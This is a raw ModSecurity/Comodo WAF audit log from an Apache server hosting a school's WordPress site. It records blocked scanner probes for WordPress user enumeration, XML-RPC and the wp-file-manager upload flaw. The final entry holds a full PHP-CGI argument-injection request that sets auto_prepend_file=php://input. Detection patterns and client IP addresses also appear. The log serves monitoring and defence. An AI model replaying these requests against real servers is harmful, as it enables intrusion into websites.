%s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585006180578 4625 (- - -) Stopwatch2: 1747585006180578 4625; combined=3251, p1=476, p2=2740, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a97b4c3c-Z-- --cb26d61b-A-- [18/May/2025:23:17:45 +0700] aCoIKUPRqak7bVuUS6e0CAAAAI0 103.236.140.4 35908 103.236.140.4 8181 --cb26d61b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.219.141.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.219.141.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb26d61b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb26d61b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585065025572 3466 (- - -) Stopwatch2: 1747585065025572 3466; combined=1505, p1=522, p2=953, p3=0, p4=0, p5=30, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb26d61b-Z-- --68ef0069-A-- [18/May/2025:23:17:58 +0700] aCoINhir-GlPrFVVKe7K8gAAAEU 103.236.140.4 36108 103.236.140.4 8181 --68ef0069-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.47.34.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.47.34.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --68ef0069-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68ef0069-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585078146716 2824 (- - -) Stopwatch2: 1747585078146716 2824; combined=1305, p1=422, p2=851, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68ef0069-Z-- --8df7962e-A-- [18/May/2025:23:19:21 +0700] aCoIifypzAd0elWOk7rWQgAAAAE 103.236.140.4 37656 103.236.140.4 8181 --8df7962e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8df7962e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8df7962e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585161565372 3767 (- - -) Stopwatch2: 1747585161565372 3767; combined=2142, p1=615, p2=1491, p3=0, p4=0, p5=35, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8df7962e-Z-- --dc2e451a-A-- [18/May/2025:23:19:28 +0700] aCoIkBir-GlPrFVVKe7LTAAAAFA 103.236.140.4 37808 103.236.140.4 8181 --dc2e451a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc2e451a-C-- demo.sayHello --dc2e451a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc2e451a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747585168346513 5666 (- - -) Stopwatch2: 1747585168346513 5666; combined=4205, p1=549, p2=3430, p3=31, p4=35, p5=94, sr=71, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc2e451a-Z-- --66870779-A-- [18/May/2025:23:25:56 +0700] aCoKFBir-GlPrFVVKe7NHAAAAE4 103.236.140.4 45706 103.236.140.4 8181 --66870779-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --66870779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66870779-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585556215391 1995 (- - -) Stopwatch2: 1747585556215391 1995; combined=1029, p1=319, p2=653, p3=0, p4=0, p5=57, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66870779-Z-- --42a7f70a-A-- [18/May/2025:23:26:04 +0700] aCoKHBir-GlPrFVVKe7NJwAAAFY 103.236.140.4 45884 103.236.140.4 8181 --42a7f70a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.179 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --42a7f70a-C-- demo.sayHello --42a7f70a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --42a7f70a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747585564615282 6180 (- - -) Stopwatch2: 1747585564615282 6180; combined=5009, p1=660, p2=4150, p3=36, p4=37, p5=76, sr=79, sw=50, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42a7f70a-Z-- --304d8f7e-A-- [18/May/2025:23:26:20 +0700] aCoKLBir-GlPrFVVKe7NSgAAAFE 103.236.140.4 46174 103.236.140.4 8181 --304d8f7e-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --304d8f7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --304d8f7e-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585580706150 3096 (- - -) Stopwatch2: 1747585580706150 3096; combined=1805, p1=433, p2=1332, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --304d8f7e-Z-- --2b08550c-A-- [18/May/2025:23:26:20 +0700] aCoKLBir-GlPrFVVKe7NSwAAAEE 103.236.140.4 46176 103.236.140.4 8181 --2b08550c-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2b08550c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b08550c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585580863332 2988 (- - -) Stopwatch2: 1747585580863332 2988; combined=1601, p1=404, p2=1167, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b08550c-Z-- --4d62f103-A-- [18/May/2025:23:32:35 +0700] aCoLoxir-GlPrFVVKe7PKAAAAEQ 103.236.140.4 53708 103.236.140.4 8181 --4d62f103-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d62f103-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d62f103-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585955435389 2587 (- - -) Stopwatch2: 1747585955435389 2587; combined=1218, p1=410, p2=780, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d62f103-Z-- --f6a73e13-A-- [18/May/2025:23:32:43 +0700] aCoLq0PRqak7bVuUS6e5mwAAAI0 103.236.140.4 53868 103.236.140.4 8181 --f6a73e13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f6a73e13-C-- demo.sayHello --f6a73e13-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6a73e13-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747585963219322 5161 (- - -) Stopwatch2: 1747585963219322 5161; combined=3729, p1=474, p2=3057, p3=28, p4=31, p5=82, sr=63, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6a73e13-Z-- --dc964870-A-- [18/May/2025:23:33:36 +0700] aCoL4EPRqak7bVuUS6e50AAAAJc 103.236.140.4 54808 103.236.140.4 8181 --dc964870-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 168.228.164.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 168.228.164.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dc964870-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc964870-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747586016549172 2617 (- - -) Stopwatch2: 1747586016549172 2617; combined=1460, p1=448, p2=980, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc964870-Z-- --1a1d5c29-A-- [18/May/2025:23:35:55 +0700] aCoMa_ypzAd0elWOk7rbMgAAAA8 103.236.140.4 56814 103.236.140.4 8181 --1a1d5c29-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 96.9.86.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 96.9.86.107 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1a1d5c29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a1d5c29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747586155964561 2123 (- - -) Stopwatch2: 1747586155964561 2123; combined=1094, p1=349, p2=713, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a1d5c29-Z-- --5f52b756-A-- [18/May/2025:23:42:57 +0700] aCoOEUPRqak7bVuUS6e8RwAAAIw 103.236.140.4 35656 103.236.140.4 8181 --5f52b756-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f52b756-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f52b756-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747586577784101 2290 (- - -) Stopwatch2: 1747586577784101 2290; combined=1010, p1=358, p2=629, p3=0, p4=0, p5=23, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f52b756-Z-- --44e96535-A-- [18/May/2025:23:43:05 +0700] aCoOGfypzAd0elWOk7rdCQAAAAw 103.236.140.4 35752 103.236.140.4 8181 --44e96535-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --44e96535-C-- demo.sayHello --44e96535-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --44e96535-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747586585409167 5553 (- - -) Stopwatch2: 1747586585409167 5553; combined=4487, p1=556, p2=3667, p3=35, p4=63, p5=98, sr=74, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44e96535-Z-- --6236bd4a-A-- [19/May/2025:00:10:13 +0700] aCoUdUPRqak7bVuUS6fEYwAAAII 103.236.140.4 37200 103.236.140.4 8181 --6236bd4a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 68.183.86.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 68.183.86.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6236bd4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6236bd4a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747588213329161 3521 (- - -) Stopwatch2: 1747588213329161 3521; combined=1514, p1=526, p2=956, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6236bd4a-Z-- --c7707944-A-- [19/May/2025:00:11:59 +0700] aCoU30PRqak7bVuUS6fEZQAAAI8 103.236.140.4 37208 103.236.140.4 8181 --c7707944-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --c7707944-C-- --c7707944-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7707944-E-- --c7707944-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747588319306375 3856 (- - -) Stopwatch2: 1747588319306375 3856; combined=2308, p1=453, p2=1824, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 